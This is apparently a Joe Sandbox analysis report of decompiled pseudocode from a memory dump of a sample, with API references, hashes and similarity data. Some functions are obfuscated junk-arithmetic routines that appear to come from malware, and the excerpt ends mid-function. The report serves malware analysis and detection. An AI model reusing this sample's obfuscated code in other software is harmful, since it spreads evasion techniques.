						 *((intOrPtr*)(_t57 - 4)) = 0xfffffffe;
						_t36 = E003B2B5A(0, _t56);
						__eflags =  *(_t57 - 0x1c);
						if( *(_t57 - 0x1c) == 0) {
							goto L8;
						}
						_t37 = _t56;
						goto L9;
					} else {
						 *((intOrPtr*)(E0039FA66(__eflags))) = 0x18;
						_t36 = E0039FA79(__eflags);
						 *_t36 = 0;
						goto L8;
					}
				} else {
					_t36 = E0039FA8C(GetLastError());
					L8:
					_t37 = _t36 | 0xffffffff;
					L9:
					return E003A2A15(_t37);
				}
			}

0x003b2a6c
0x003b2a6c
0x003b2a6c
0x003b2a6e
0x003b2a73
0x003b2a7a
0x003b2a7d
0x003b2a83
0x003b2a85
0x003b2a85
0x003b2a8f
0x003b2a91
0x003b2a91
0x003b2a98
0x003b2a9a
0x003b2a9a
0x003b2aa0
0x003b2aa8
0x003b2ac0
0x003b2ac3
0x003b2aca
0x003b2acd
0x003b2acf
0x003b2acf
0x003b2acf
0x003b2ac5
0x003b2ac5
0x003b2ac5
0x003b2ad7
0x003b2ad9
0x003b2adc
0x003b2adf
0x003b2af5
0x003b2afc
0x003b2b0b
0x003b2b17
0x003b2b1c
0x003b2b26
0x003b2b2f
0x003b2b32
0x003b2b39
0x003b2b40
0x003b2b45
0x003b2b48
0x00000000
0x00000000
0x003b2b4e
0x00000000
0x003b2ae1
0x003b2ae6
0x003b2aec
0x003b2af1
0x00000000
0x003b2af1
0x003b2aaa
0x003b2ab1
0x003b2ab7
0x003b2ab7
0x003b2aba
0x003b2abf
0x003b2abf

APIs

GetFileType.KERNEL32(?,?,?,003CBFA0,0000000C), ref: 003B2AA0
GetLastError.KERNEL32(?,?,003CBFA0,0000000C), ref: 003B2AAA
__dosmaperr.LIBCMT ref: 003B2AB1
__alloc_osfhnd.LIBCMT ref: 003B2AD2
__set_osfhnd.LIBCMT ref: 003B2AFC

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
String ID:
API String ID: 43408053-0
Opcode ID: 0824541a799348a98b41590d224d22c9b20701f8d9d258d188eab50f3c3207f9
Instruction ID: 0799342dc531192ce149bc5c3ddabe048f9130feb5f36c30c0f23e130bae4b04
Opcode Fuzzy Hash: 0824541a799348a98b41590d224d22c9b20701f8d9d258d188eab50f3c3207f9
Instruction Fuzzy Hash: CB21F5315012459ECF23AF79C8067DA7B60AF46328F188349E6648F5E3DB799A81DF40

Uniqueness

Uniqueness Score: -1.00%

Function 003B098F Relevance: 7.5, APIs: 5, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E003B098F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x3cbed8);
				E003A29D0(__ebx, __edi, __esi);
				_t28 = E0039FFF2(__ebx, __edi, _t31);
				_t12 =  *0x3cf2b0; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E003A27E5(_t20, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E003B0942(_t29,  *0x3cf4f8);
					 *(_t30 - 4) = 0xfffffffe;
					E003B09FC();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E0039FFF2(_t20, _t26, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					_push(0x20);
					E0039DFAC(_t25, _t26, _t29, _t34);
				}
				return E003A2A15(_t29);
			}

0x003b098f
0x003b098f
0x003b098f
0x003b098f
0x003b098f
0x003b0991
0x003b0996
0x003b09a0
0x003b09a2
0x003b09aa
0x003b09ce
0x003b09d0
0x003b09d6
0x003b09e0
0x003b09eb
0x003b09ee
0x003b09f5
0x003b09ac
0x003b09ac
0x003b09b0
0x00000000
0x003b09b2
0x003b09b7
0x003b09b7
0x003b09b0
0x003b09ba
0x003b09bc
0x003b09be
0x003b09c0
0x003b09c5
0x003b09cd

APIs

__getptd.LIBCMT ref: 003B099B

Part of subcall function 0039FFF2: __getptd_noexit.LIBCMT ref: 0039FFF5
Part of subcall function 0039FFF2: __amsg_exit.LIBCMT ref: 003A0002

__getptd.LIBCMT ref: 003B09B2
__amsg_exit.LIBCMT ref: 003B09C0
__lock.LIBCMT ref: 003B09D0
__updatetlocinfoEx_nolock.LIBCMT ref: 003B09E4

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 830c30a70fd5eb1a5bc7321905ff4882ff23aa86545ef833136ae2d07bcc0202
Instruction ID: d0b2290c0ae20f31c70cab4b08e94ff203751f58b24da29a6709b32c83daa43b
Opcode Fuzzy Hash: 830c30a70fd5eb1a5bc7321905ff4882ff23aa86545ef833136ae2d07bcc0202
Instruction Fuzzy Hash: 3AF090329057109FEB3BBB785803B8F72A0AF01724F214159F606AF9E3CB6459408A55

Uniqueness

Uniqueness Score: -1.00%

Function 0038E1C1 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0038E1C1(void* __eax, void* __ebx, void* __edi, void* __eflags, signed char __fp0) {
				signed char _v8;
				long long _v12;
				long long _v20;
				char _v48;
				char _v76;
				long long _v84;
				char _v112;
				char _v140;
				char _v141;
				char _v396;
				char _v652;
				void* __esi;
				short _t57;
				void* _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				signed char _t73;
				void* _t78;
				signed char _t85;
				void* _t93;
				void* _t107;
				intOrPtr _t108;
				signed char _t111;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t131;
				signed char _t136;
				intOrPtr _t137;
				intOrPtr _t139;
				signed char _t142;
				void* _t167;
				long long _t188;
				intOrPtr _t197;

				_t167 = __eflags;
				_t145 = __edi;
				_t107 = __ebx;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t57 =  *0x3ce4a8; // 0x1d14
				_t108 =  *0x3ce0e0; // 0xd349f562
				_t137 =  *0x3ce1d0; // 0x2f751c97
				_t2 = _t57 - _t108 + 0x9b8b08e; // 0x392dcd25
				 *0x3ce1d0 = _t137 + _t2;
				 *0x3ce4a8 =  *0x3ce4a8 - 1;
				 *0x3ce0e0 =  *0x3ce0e0 - 1;
				E00395380( &_v48, __edi);
				E00395380( &_v112, __edi);
				_t111 =  *0x3ce230; // 0xeabf
				_v8 = _t111;
				asm("fild dword [ebp-0x4]");
				_v8 = __fp0;
				 *0x3ce230 = E0039CABC();
				asm("fld1");
				asm("faddp st1, st0");
				_v141 = 0;
				_t64 = E0038CF90(_t167,  *0x3ce0b0, 0x3fc1, 0x20);
				_t112 =  *0x3d04ec; // 0x1
				_t139 =  *0x3d0770; // 0x2
				_t65 =  *0x3d0744; // 0x1
				_push(_t65);
				_t66 =  *0x3d076c; // 0x6
				_push(_t112);
				_push(_t139);
				E0039E0C2( &_v396, 0xff, _t64, _t66);
				E00396570(0x20, _t64);
				E00390980( &_v48,  *0x3ce0b0,  &_v396);
				E0039C990( &_v396, 0, 0x100);
				_v12 =  *0x3ce190;
				asm("fsubr qword [ebp-0x8]");
				 *0x3ce190 =  *0x3ce3b0 -  *0x3c8090;
				asm("fld1");
				asm("fsubp st1, st0");
				E00390980( &_v48,  *0x3ce3b0, "C:\\Users\\hardz");
				_t73 = E0038AF70(0xd);
				asm("fsubr qword [0x3c8088]");
				_t180 =  *0x3c8080;
				asm("fucompp");
				asm("fnstsw ax");
				if((_t73 & 0x00000044) == 0) {
					_t180 =  *0x3c8078;
					asm("fucompp");
					asm("fnstsw ax");
					_t169 = _t73 & 0x00000044;
					if((_t73 & 0x00000044) == 0) {
						asm("fld1");
						asm("fsubp st2, st0");
						asm("fxch st0, st1");
						 *0x3ce324 = st0;
						_v20 =  *0x3ce388;
						_v12 =  *0x3ce1e4;
						asm("fsubr qword [ebp-0x8]");
						_v12 =  *0x3ce1a8;
						_t197 =  *0x3ce324;
						asm("fsubr qword [ebp-0x8]");
						asm("fsubr qword [ebp-0x10]");
						 *0x3ce388 = _t197;
						_t180 = _t197 +  *0x3ce1e4;
						 *0x3ce1e4 = _t197 +  *0x3ce1e4;
					}
				}
				E0038AF70(0xa);
				E00399F60(_t180,  &_v48);
				 *0x3ce5e4 = 0xcefce338;
				E003906A0(_t145,  &_v48);
				_t78 = E0038FFA0( &_v48);
				E0038A070(L00395200( &_v48), _t79, _t78, 1,  &_v112);
				E00392290(_t169,  &_v48);
				E00389630( &_v76);
				_t148 = E0038CF90(_t169, _t180, 0x3ddc, 0x10);
				E00398260( &_v76, _t180, _t83);
				 *0x3ce408 =  *0x3ce408 - 1;
				_v20 =  *0x3ce548 +  *0x3c8070;
				_t142 =  *0x3ce408; // 0xcc62
				_t85 = _t142;
				_v8 = _t85;
				asm("fild dword [ebp-0x4]");
				asm("fsubp st1, st0");
				_t184 = _v20;
				asm("fucompp");
				asm("fnstsw ax");
				_t170 = _t85 & 0x00000044;
				if((_t85 & 0x00000044) == 0) {
					_t188 =  *0x3ce25c;
					_t136 =  *0x3ce01c; // 0x9b827a58
					_v84 = _t188;
					_v8 = _t136;
					asm("fild dword [ebp-0x4]");
					_v20 = _t188;
					_t184 =  *0x3ce3b4 + _v20 +  *0x3c8068;
					asm("fsubr qword [ebp-0x50]");
					 *0x3ce25c =  *0x3ce3b4 + _v20 +  *0x3c8068;
				}
				E00396570(0x10, _t148);
				_t124 =  *0x3cfc34; // 0x0
				E0039B1F0( &_v76, _t184, E0038DE60(_t107, _t124, _t170,  &_v140));
				E00393030( &_v140, _t145, _t148);
				E00384780( &_v76, E0038CF90(_t170, _t184, 0xfbd, 7));
				E00396570(7, _t90);
				_t93 = E0038FFA0( &_v112);
				E00390A30( &_v76, L00395200( &_v112), _t93);
				E00392290(_t170,  &_v112);
				_t131 =  *0x3d0288; // 0x0
				E0038D540(_t107, _t184,  &_v652, _t131);
				asm("fsubp st1, st0");
				 *0x3ce160 =  *0x3ce2f0 -  *0x3c8060;
				_t150 = E0038CF90(_t170,  *0x3ce2f0 -  *0x3c8060, 0x1446, 0xb);
				E003992C0( &_v652, _t99,  *0x3ce2f0 -  *0x3c8060,  &_v652, _t99,  &_v76, 0);
				E00396570(0xb, _t99);
				E00393030( &_v76, _t145, _t150);
				E00399F50();
				E00399F50();
				return 1;
			}

0x0038e1c1
0x0038e1c1
0x0038e1c1
0x0038e1c3
0x0038e1c4
0x0038e1c5
0x0038e1c6
0x0038e1c7
0x0038e1c8
0x0038e1c9
0x0038e1ca
0x0038e1cb
0x0038e1cc
0x0038e1cd
0x0038e1ce
0x0038e1cf
0x0038e1d9
0x0038e1df
0x0038e1e5
0x0038e1ee
0x0038e1f5
0x0038e1fa
0x0038e201
0x0038e20b
0x0038e213
0x0038e218
0x0038e222
0x0038e225
0x0038e228
0x0038e239
0x0038e245
0x0038e249
0x0038e250
0x0038e25d
0x0038e262
0x0038e268
0x0038e270
0x0038e275
0x0038e276
0x0038e27b
0x0038e27c
0x0038e28b
0x0038e293
0x0038e2a5
0x0038e2b8
0x0038e2c3
0x0038e2dd
0x0038e2e0
0x0038e2ec
0x0038e2ee
0x0038e2f6
0x0038e300
0x0038e30b
0x0038e311
0x0038e317
0x0038e319
0x0038e31e
0x0038e326
0x0038e32c
0x0038e32e
0x0038e330
0x0038e333
0x0038e33b
0x0038e33f
0x0038e341
0x0038e343
0x0038e34f
0x0038e358
0x0038e361
0x0038e364
0x0038e367
0x0038e36d
0x0038e370
0x0038e373
0x0038e379
0x0038e37f
0x0038e37f
0x0038e333
0x0038e38a
0x0038e393
0x0038e39b
0x0038e3a6
0x0038e3b7
0x0038e3c6
0x0038e3cf
0x0038e3da
0x0038e3ee
0x0038e3f4
0x0038e3f9
0x0038e40c
0x0038e415
0x0038e41c
0x0038e41f
0x0038e422
0x0038e425
0x0038e427
0x0038e42a
0x0038e42c
0x0038e42e
0x0038e431
0x0038e433
0x0038e439
0x0038e43f
0x0038e442
0x0038e445
0x0038e448
0x0038e454
0x0038e45a
0x0038e45d
0x0038e45d
0x0038e466
0x0038e46b
0x0038e484
0x0038e48f
0x0038e4a9
0x0038e4b1
0x0038e4bc
0x0038e4ce
0x0038e4d7
0x0038e4dc
0x0038e4ea
0x0038e508
0x0038e50a
0x0038e515
0x0038e525
0x0038e52d
0x0038e538
0x0038e540
0x0038e548
0x0038e556

APIs

Part of subcall function 0038CF90: _malloc.LIBCMT ref: 0038CFC7

__snprintf.LIBCMT ref: 0038E28B

Part of subcall function 00396570: _memset.LIBCMT ref: 00396593
Part of subcall function 00396570: _free.LIBCMT ref: 00396599

_memset.LIBCMT ref: 0038E2B8

Strings

C:\Users\user, xrefs: 0038E2CF
7i\, xrefs: 0038E343

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: _memset$__snprintf_free_malloc
String ID: 7i\$C:\Users\user
API String ID: 801102166-4181716859
Opcode ID: 88a21509deee8910fccf087d92eb43b4a83667c1b79dd0546c2c5ff4f8d0c539
Instruction ID: dd6c0fbfc6679ec0bbf1810accae0ef7906c6ab7d34f34dd94627ea77dcb58c0
Opcode Fuzzy Hash: 88a21509deee8910fccf087d92eb43b4a83667c1b79dd0546c2c5ff4f8d0c539
Instruction Fuzzy Hash: FE918F71901218EBDB06FBA0EC46FED7B3CFF44700F504495E585AA1A5EF702A68CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0038E1D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 243
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0038E1D0(void* __ebx, void* __edi, void* __eflags, signed char __fp0) {
				signed char _v8;
				long long _v12;
				long long _v20;
				char _v48;
				char _v76;
				long long _v84;
				char _v112;
				char _v140;
				char _v141;
				char _v396;
				char _v652;
				void* __esi;
				short _t55;
				void* _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				signed char _t71;
				void* _t76;
				signed char _t83;
				void* _t91;
				void* _t105;
				intOrPtr _t106;
				signed char _t109;
				intOrPtr _t110;
				intOrPtr _t122;
				intOrPtr _t129;
				signed char _t134;
				intOrPtr _t135;
				intOrPtr _t137;
				signed char _t140;
				void* _t160;
				long long _t181;
				intOrPtr _t190;

				_t160 = __eflags;
				_t143 = __edi;
				_t105 = __ebx;
				_t55 =  *0x3ce4a8; // 0x1d14
				_t106 =  *0x3ce0e0; // 0xd349f562
				_t135 =  *0x3ce1d0; // 0x2f751c97
				_t2 = _t55 - _t106 + 0x9b8b08e; // 0x392dcd25
				 *0x3ce1d0 = _t135 + _t2;
				 *0x3ce4a8 =  *0x3ce4a8 - 1;
				 *0x3ce0e0 =  *0x3ce0e0 - 1;
				E00395380( &_v48, __edi);
				E00395380( &_v112, __edi);
				_t109 =  *0x3ce230; // 0xeabf
				_v8 = _t109;
				asm("fild dword [ebp-0x4]");
				_v8 = __fp0;
				 *0x3ce230 = E0039CABC();
				asm("fld1");
				asm("faddp st1, st0");
				_v141 = 0;
				_t62 = E0038CF90(_t160,  *0x3ce0b0, 0x3fc1, 0x20);
				_t110 =  *0x3d04ec; // 0x1
				_t137 =  *0x3d0770; // 0x2
				_t63 =  *0x3d0744; // 0x1
				_push(_t63);
				_t64 =  *0x3d076c; // 0x6
				_push(_t110);
				_push(_t137);
				E0039E0C2( &_v396, 0xff, _t62, _t64);
				E00396570(0x20, _t62);
				E00390980( &_v48,  *0x3ce0b0,  &_v396);
				E0039C990( &_v396, 0, 0x100);
				_v12 =  *0x3ce190;
				asm("fsubr qword [ebp-0x8]");
				 *0x3ce190 =  *0x3ce3b0 -  *0x3c8090;
				asm("fld1");
				asm("fsubp st1, st0");
				E00390980( &_v48,  *0x3ce3b0, "C:\\Users\\hardz");
				_t71 = E0038AF70(0xd);
				asm("fsubr qword [0x3c8088]");
				_t173 =  *0x3c8080;
				asm("fucompp");
				asm("fnstsw ax");
				if((_t71 & 0x00000044) == 0) {
					_t173 =  *0x3c8078;
					asm("fucompp");
					asm("fnstsw ax");
					_t162 = _t71 & 0x00000044;
					if((_t71 & 0x00000044) == 0) {
						asm("fld1");
						asm("fsubp st2, st0");
						asm("fxch st0, st1");
						 *0x3ce324 = st0;
						_v20 =  *0x3ce388;
						_v12 =  *0x3ce1e4;
						asm("fsubr qword [ebp-0x8]");
						_v12 =  *0x3ce1a8;
						_t190 =  *0x3ce324;
						asm("fsubr qword [ebp-0x8]");
						asm("fsubr qword [ebp-0x10]");
						 *0x3ce388 = _t190;
						_t173 = _t190 +  *0x3ce1e4;
						 *0x3ce1e4 = _t190 +  *0x3ce1e4;
					}
				}
				E0038AF70(0xa);
				E00399F60(_t173,  &_v48);
				 *0x3ce5e4 = 0xcefce338;
				E003906A0(_t143,  &_v48);
				_t76 = E0038FFA0( &_v48);
				E0038A070(L00395200( &_v48), _t77, _t76, 1,  &_v112);
				E00392290(_t162,  &_v48);
				E00389630( &_v76);
				_t146 = E0038CF90(_t162, _t173, 0x3ddc, 0x10);
				E00398260( &_v76, _t173, _t81);
				 *0x3ce408 =  *0x3ce408 - 1;
				_v20 =  *0x3ce548 +  *0x3c8070;
				_t140 =  *0x3ce408; // 0xcc62
				_t83 = _t140;
				_v8 = _t83;
				asm("fild dword [ebp-0x4]");
				asm("fsubp st1, st0");
				_t177 = _v20;
				asm("fucompp");
				asm("fnstsw ax");
				_t163 = _t83 & 0x00000044;
				if((_t83 & 0x00000044) == 0) {
					_t181 =  *0x3ce25c;
					_t134 =  *0x3ce01c; // 0x9b827a58
					_v84 = _t181;
					_v8 = _t134;
					asm("fild dword [ebp-0x4]");
					_v20 = _t181;
					_t177 =  *0x3ce3b4 + _v20 +  *0x3c8068;
					asm("fsubr qword [ebp-0x50]");
					 *0x3ce25c =  *0x3ce3b4 + _v20 +  *0x3c8068;
				}
				E00396570(0x10, _t146);
				_t122 =  *0x3cfc34; // 0x0
				E0039B1F0( &_v76, _t177, E0038DE60(_t105, _t122, _t163,  &_v140));
				E00393030( &_v140, _t143, _t146);
				E00384780( &_v76, E0038CF90(_t163, _t177, 0xfbd, 7));
				E00396570(7, _t88);
				_t91 = E0038FFA0( &_v112);
				E00390A30( &_v76, L00395200( &_v112), _t91);
				E00392290(_t163,  &_v112);
				_t129 =  *0x3d0288; // 0x0
				E0038D540(_t105, _t177,  &_v652, _t129);
				asm("fsubp st1, st0");
				 *0x3ce160 =  *0x3ce2f0 -  *0x3c8060;
				_t148 = E0038CF90(_t163,  *0x3ce2f0 -  *0x3c8060, 0x1446, 0xb);
				E003992C0( &_v652, _t97,  *0x3ce2f0 -  *0x3c8060,  &_v652, _t97,  &_v76, 0);
				E00396570(0xb, _t97);
				E00393030( &_v76, _t143, _t148);
				E00399F50();
				E00399F50();
				return 1;
			}

0x0038e1d0
0x0038e1d0
0x0038e1d0
0x0038e1d9
0x0038e1df
0x0038e1e5
0x0038e1ee
0x0038e1f5
0x0038e1fa
0x0038e201
0x0038e20b
0x0038e213
0x0038e218
0x0038e222
0x0038e225
0x0038e228
0x0038e239
0x0038e245
0x0038e249
0x0038e250
0x0038e25d
0x0038e262
0x0038e268
0x0038e270
0x0038e275
0x0038e276
0x0038e27b
0x0038e27c
0x0038e28b
0x0038e293
0x0038e2a5
0x0038e2b8
0x0038e2c3
0x0038e2dd
0x0038e2e0
0x0038e2ec
0x0038e2ee
0x0038e2f6
0x0038e300
0x0038e30b
0x0038e311
0x0038e317
0x0038e319
0x0038e31e
0x0038e326
0x0038e32c
0x0038e32e
0x0038e330
0x0038e333
0x0038e33b
0x0038e33f
0x0038e341
0x0038e343
0x0038e34f
0x0038e358
0x0038e361
0x0038e364
0x0038e367
0x0038e36d
0x0038e370
0x0038e373
0x0038e379
0x0038e37f
0x0038e37f
0x0038e333
0x0038e38a
0x0038e393
0x0038e39b
0x0038e3a6
0x0038e3b7
0x0038e3c6
0x0038e3cf
0x0038e3da
0x0038e3ee
0x0038e3f4
0x0038e3f9
0x0038e40c
0x0038e415
0x0038e41c
0x0038e41f
0x0038e422
0x0038e425
0x0038e427
0x0038e42a
0x0038e42c
0x0038e42e
0x0038e431
0x0038e433
0x0038e439
0x0038e43f
0x0038e442
0x0038e445
0x0038e448
0x0038e454
0x0038e45a
0x0038e45d
0x0038e45d
0x0038e466
0x0038e46b
0x0038e484
0x0038e48f
0x0038e4a9
0x0038e4b1
0x0038e4bc
0x0038e4ce
0x0038e4d7
0x0038e4dc
0x0038e4ea
0x0038e508
0x0038e50a
0x0038e515
0x0038e525
0x0038e52d
0x0038e538
0x0038e540
0x0038e548
0x0038e556

APIs

Part of subcall function 0038CF90: _malloc.LIBCMT ref: 0038CFC7

__snprintf.LIBCMT ref: 0038E28B

Part of subcall function 00396570: _memset.LIBCMT ref: 00396593
Part of subcall function 00396570: _free.LIBCMT ref: 00396599

_memset.LIBCMT ref: 0038E2B8

Strings

C:\Users\user, xrefs: 0038E2CF
7i\, xrefs: 0038E343

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: _memset$__snprintf_free_malloc
String ID: 7i\$C:\Users\user
API String ID: 801102166-4181716859
Opcode ID: b8b9d854b72471f7ea7ad85e7349d107f71f456238c88caf3059d9c584a3bf45
Instruction ID: fa736308974389364789d30e85d59da065a62a94cd51519416a7b7e917318a03
Opcode Fuzzy Hash: b8b9d854b72471f7ea7ad85e7349d107f71f456238c88caf3059d9c584a3bf45
Instruction Fuzzy Hash: 8B918E71901218EBDB06FBA0EC46FED7B3CFF44700F504495E585AA1A5EF702A68CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00389C80 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00389C80(signed int __fp0, signed char _a4) {
				intOrPtr _v8;
				long long _v12;
				signed int _v20;
				signed int _t46;
				intOrPtr _t50;
				signed char _t54;
				intOrPtr _t55;
				signed char _t56;
				signed char _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				signed char _t64;
				intOrPtr _t66;
				intOrPtr _t67;
				signed char _t68;
				signed char _t70;
				signed char _t73;
				signed char _t74;
				signed char _t80;
				intOrPtr _t82;
				signed int _t85;
				signed int _t88;
				void** _t91;
				long long _t106;
				signed long long _t109;
				signed int _t111;
				intOrPtr _t123;
				signed int _t126;
				long long _t135;
				signed char _t139;
				signed int _t140;
				signed int _t148;

				_t46 =  *0x3ce550; // 0xa046b428
				 *0x3ce550 = _t46 * 0x4159cb07;
				_t66 =  *0x3ce440; // 0xeb96
				_v8 = _t66;
				asm("fild dword [ebp-0x4]");
				_v20 = __fp0;
				_v12 =  *0x3ce328 +  *0x3ce100;
				asm("fsubr qword [ebp-0x8]");
				asm("fsubr qword [ebp-0x10]");
				 *0x3ce440 = E0039CABC();
				asm("fld1");
				_t88 = _a4;
				asm("fxch st0, st1");
				 *0x3ce380 =  *0x3ce380 - st0;
				_t91 = 0x3cfdb8 + _t88 * 4;
				_t106 =  *0x3ce328 + st1;
				 *0x3ce328 = _t106;
				 *0x3ce100 = _t106 +  *0x3ce100;
				_t109 =  *0x3ce1e0 *  *0x3c75c0;
				 *0x3ce1e0 = _t109;
				 *_t91 = CreateEventA(0, 1, 0, 0);
				 *0x3ce40c =  *0x3ce40c - 1;
				_t50 =  *0x3ce55c; // 0x0
				_t67 =  *0x3ce40c; // 0x42a5c331
				if(0x7ed4e944 - _t67 < _t50 + 0x389ebbb) {
					_t64 =  *0x3ce2fc; // 0x3a84af9e
					_a4 = _t64;
					asm("fild dword [ebp+0x8]");
					_a4 = _t109;
					 *0x3ce2fc = E0039CABC();
				}
				 *0x3ce38c =  *0x3ce38c + 1;
				_t111 =  *0x3ce150 -  *0x3c75bc;
				_t68 =  *0x3ce38c; // 0x93fc1fee
				_a4 = _t68;
				_v20 = _t111;
				asm("fild dword [ebp+0x8]");
				_v20 = _t111 + _v20;
				 *0x3ce3b0 =  *0x3ce3b0 * _v20;
				asm("fld1");
				asm("faddp st1, st0");
				 *0x3ce580 = ( *0x3ce580 & 0x0000ffff) * 0x796ae084;
				_t54 = WaitForSingleObject( *_t91, 0x2710);
				_v20 =  *0x3ce480 -  *0x3c75b0 -  *0x3c75a8;
				asm("fucompp");
				asm("fnstsw ax");
				if((_t54 & 0x00000044) != 0) {
					asm("fld1");
				} else {
					asm("fld1");
					asm("fsubp st2, st0");
					asm("fxch st0, st1");
					 *0x3ce488 = st0;
					 *0x3ce3d0 =  *0x3ce3d0 - 1;
					_t74 =  *0x3ce3d0; // 0x399d3e12
					_t148 =  *0x3ce488 -  *0x3c75a0;
					_a4 = _t74;
					_v20 = _t148;
					asm("fild dword [ebp+0x8]");
					asm("fsubr qword [ebp-0x10]");
					_v20 = _t148;
					asm("fcomp qword [ebp-0x10]");
					asm("fnstsw ax");
					 *0x3ce134 =  *0x3ce134 + st1;
					if((_t54 & 0x00000001) == 0) {
						_t85 =  *0x3ce5a4; // 0x8e8510c4
						 *0x3ce5a4 = _t85 * 0xfd29f16a;
					}
				}
				_v20 =  *0x3ce4d8 -  *0x3ce100;
				_t123 =  *0x3ce438;
				asm("fsubr qword [ebp-0x10]");
				 *0x3ce260 = _t123;
				 *0x3ce438 = _t123 +  *0x3ce438;
				_t55 =  *0x3d0448; // 0x3c3935
				asm("fld1");
				_t126 =  *0x3ce100 - st0;
				asm("fxch st0, st1");
				 *0x3ce100 = _t126;
				_t80 =  *0x3ce36c; // 0x1baf
				 *0x3d073c =  *0x3d073c ^  *(_t55 + _t88 * 4);
				_t56 = _t80;
				_a4 = _t56;
				asm("fild dword [ebp+0x8]");
				_v20 = _t126;
				 *0x3ce240 =  *0x3ce240 + _v20;
				 *0x3ce36c =  *0x3ce36c + 1;
				_v20 =  *0x3ce4e0 +  *0x3c7598;
				_v20 =  *0x3ce578 + _v20;
				_t135 =  *0x3ce2e0 -  *0x3c7590 -  *0x3c7588;
				asm("fcomp qword [ebp-0x10]");
				asm("fnstsw ax");
				asm("fsubr qword [0x3ce578]");
				 *0x3ce578 = _t135;
				if((_t56 & 0x00000005) == 0) {
					 *0x3ce540 = 0x4e23b700;
				}
				_t70 =  *0x3ce440; // 0xeb96
				_a4 = _t70;
				asm("fild dword [ebp+0x8]");
				 *0x3ce348 = _t135;
				_t58 = CloseHandle( *_t91);
				_v20 =  *0x3ce3b0;
				asm("fcomp qword [ebp-0x10]");
				asm("fnstsw ax");
				_t139 =  *0x3ce39c;
				asm("fld1");
				asm("faddp st1, st0");
				 *0x3ce39c = _t139;
				if((_t58 & 0x00000005) == 0) {
					_t73 =  *0x3ce524; // 0x0
					_a4 = _t73;
					asm("fild dword [ebp+0x8]");
					_a4 = _t139;
					 *0x3ce524 = E0039CABC();
				}
				_t140 =  *0x3ce3a8;
				_t59 =  *0x3ce118; // 0x49bb
				_a4 = _t59 - 0x460337bb;
